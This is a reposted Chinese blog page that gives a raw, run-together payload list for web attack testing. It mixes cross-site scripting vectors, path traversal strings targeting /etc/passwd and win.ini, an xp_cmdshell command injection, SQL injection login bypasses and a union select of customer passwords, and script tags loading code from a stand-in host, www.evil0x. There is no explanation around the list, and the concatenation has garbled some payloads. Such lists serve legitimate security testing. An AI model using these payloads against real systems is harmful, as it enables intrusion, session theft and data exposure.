#笔记(二十)#XSS跨站测试代码大全

阅读: 评论:0

#笔记(二十)#XSS跨站测试代码大全

#笔记(二十)#XSS跨站测试代码大全

XSS跨站测试代码大全

转载自:原博客
‘><script>kie)</script>=’><script>kie)</script><script>kie)</script><script>alert(vulnerable)</script>%3Cscript%3Ealert(‘XSS’)%3C/script%3E<script>alert(‘XSS’)</script><img src=”javascript:alert(‘XSS’)”>%0a%0a<script>alert(”Vulnerable”)</script>.jsp%22%3cscript%3ealert(%22xss%22)%3c/script%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html%3f.jsp%3f.jsp<script>alert(‘Vulnerable’);</script><script>alert(‘Vulnerable’)</script>?sql_debug=1a%5c.aspxa.jsp/<script>alert(‘Vulnerable’)</script>a/a?<script>alert(‘Vulnerable’)</script>“><script>alert(‘Vulnerable’)</script>‘;p_cmdshell%20’dir%20 c:%20>%20c:inetpubwwwroot?.txt’–&&%22%3E%3Cscript%kie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=://www.evil0x/://www.evil0x/etc/passwd................windowssystem.ini................windowssystem.ini”;!–“<XSS>=&{()}<IMG src=”javascript:alert(‘XSS’);”><IMG src=javascript:alert(‘XSS’)><IMG src=JaVaScRiPt:alert(‘XSS’)><IMG src=JaVaScRiPt:alert(“XSS”)><IMG src=javascript:alert(‘XSS’)><IMG src=javascript:alert(‘XSS’)><IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><IMG src=”jav ascript:alert(‘XSS’);”><IMG src=”jav ascript:alert(‘XSS’);”><IMG src=”jav ascript:alert(‘XSS’);”>“<IMG src=javascript:alert(”XSS”)>”;’ > out<IMG src=” javascript:alert(‘XSS’);”><SCRIPT>a=/XSS/alert(a.source)</SCRIPT><BODY BACKGROUND=”javascript:alert(‘XSS’)”><BODY ONLOAD=alert(‘XSS’)><IMG DYNSRC=”javascript:alert(‘XSS’)”><IMG LOWSRC=”javascript:alert(‘XSS’)”><BGSOUND src=”javascript:alert(‘XSS’);”><br size=”&{alert(‘XSS’)}”><LAYER src=”.js”></layer><LINK REL=”stylesheet” href=”javascript:alert(‘XSS’);”><IMG src=’vbscript:msgbox(“XSS”)’><IMG src=”mocha:”><IMG src=”livescript:”><META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”><IFRAME src=javascript:alert(‘XSS’)></IFRAME><FRAMESET><FRAME src=javascript:alert(‘XSS’)></FRAME></FRAMESET><TABLE BACKGROUND=”javascript:alert(‘XSS’)”><DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”><DIV STYLE=”behaviour: url(‘.html’);”><DIV STYLE=”width: expression(alert(‘XSS’));”><STYLE>@import’javascript:alert(“XSS”)';</STYLE><IMG STYLE=’xss:expression(alert(“XSS”))’><STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE><STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A class=”XSS”></A><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE><BASE href=”javascript:alert(‘XSS’);//”>getURL(“javascript:alert(‘XSS’)”)a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘XSS’);”;eval(a+b+c+d);<XML src=”javascript:alert(‘XSS’);”>“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><“<SCRIPT src=”.jpg”></SCRIPT><IMG src=”javascript:alert(‘XSS’)”<!–#exec cmd=”/bin/echo ‘<SCRIPT SRC'”–><!–#exec cmd=”/bin/echo ‘=.js></SCRIPT>'”–><IMG src=”.php?somevariables=maliciouscode”><SCRIPT a=”>” src=”.js”></SCRIPT><SCRIPT =”>” src=”.js”></SCRIPT><SCRIPT a=”>” ” src=”www.evil0x/a.js”></SCRIPT><SCRIPT “a=’>'” src=”www.evil0x/a.js”></SCRIPT><SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”.js”></SCRIPT><A href=://www.evil0x/ogle/>link</A>admin’–‘ or 0=0 –” or 0=0 –or 0=0 –‘ or 0=0 #” or 0=0 #or 0=0 #‘ or ‘x’=’x” or “x”=”x‘) or (‘x’=’x‘ or 1=1–” or 1=1–or 1=1–‘ or a=a–” or “a”=”a‘) or (‘a’=’a“) or (“a”=”ahi” or “a”=”ahi” or 1=1 –hi’ or 1=1 –hi’ or ‘a’=’ahi’) or (‘a’=’ahi”) or (“a”=”a

本文发布于:2024-02-04 19:26:03,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170714715958780.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:二十   代码   测试   笔记   大全
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23